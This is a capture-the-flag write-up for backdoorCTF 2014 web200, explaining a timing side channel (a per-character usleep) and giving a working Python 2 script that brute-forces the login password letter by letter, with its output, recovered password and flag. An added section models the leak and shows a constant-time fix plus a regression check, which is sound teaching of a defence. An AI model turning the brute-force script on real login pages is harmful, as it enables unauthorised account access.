backdoorCTF 2014 WriteUp - web200
This task is to retrieve the password to a login page.
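In the source code we find a usleep(20000) which is executed when the checked letter of the input is correct, so the response time shows whether the letter being tested is right.
To brute-force the password we write a script that sets a timeout on each request; an exception caused by exceeding the timeout marks the tested letter as correct.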
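#!/usr/bin/env python
# Python 2 script (urllib2, print statement)
import urllib2
import string

alpha = string.letters + string.digits
url = "http://backdoor.cognizance.org.in/problems/web200/submit.php?key="
time_offset = 0.4
password = ""

for i in range(5):
    # Every correct leading letter adds delay, so the timeout grows per position
    t = time_offset + (i * 0.2)
    for a in alpha:
        # Known prefix, padded to 5 characters with the candidate letter
        test_key = password + a * (5 - len(password))
        try:
            r = urllib2.urlopen(url + test_key, timeout=t)
        except Exception:
            # Timeout exceeded: the candidate letter triggered the extra sleep
            if len(password) <= i:
                password += a
                print password
                break

# Submit the recovered password and print the response
r = urllib2.urlopen(url + password)
print r.read()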
This way we can compute the complete password letter by letter.
./brute.py
Z
Z9
Z9A
Z9A9
Z9A9x
With the password Z9A9x we get the flag:
ee7528e19f87ba00b4b4c721b646a8a2
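
The leak this write-up relies on, next to a comparison that removes it, as an added Python 3 example (not code from the challenge or from the original write-up). It assumes the server compares left to right and stops at the first wrong letter; leaky_check, hardened_check, the helper names and the sample secret are all constructed for illustration, and the delay is returned as a number instead of actually sleeping.

```python
import hmac

STEP = 0.02  # seconds added per matching character: the page's usleep(20000)

def leaky_check(secret, guess):
    """Assumed shape of the vulnerable check: compare left to right, pause
    after every correct character, stop at the first wrong one.
    Returns (accepted, delay the server would have added)."""
    delay = 0.0
    for s, g in zip(secret, guess):
        if s != g:
            return False, delay
        delay += STEP
    return len(secret) == len(guess), delay

def hardened_check(secret, guess):
    """Constant-time comparison with no per-character pause."""
    return hmac.compare_digest(secret.encode(), guess.encode()), 0.0

def delay_by_prefix(check, secret, filler="#"):
    """Delay for guesses sharing 0..len(secret) leading characters with the secret."""
    out = []
    for n in range(len(secret) + 1):
        guess = secret[:n] + filler * (len(secret) - n)
        out.append(round(check(secret, guess)[1], 6))
    return out

def leaks_prefix(check, secret):
    """True if the response delay depends on how much of the guess is correct."""
    return len(set(delay_by_prefix(check, secret))) > 1

SECRET = "k3Yp4"  # constructed sample, not the challenge password

if __name__ == "__main__":
    print("leaky   :", delay_by_prefix(leaky_check, SECRET))
    print("hardened:", delay_by_prefix(hardened_check, SECRET))
```

A check like leaks_prefix can be kept as a regression test around any credential comparison: it fails as soon as the response delay starts to depend on the number of correct leading characters.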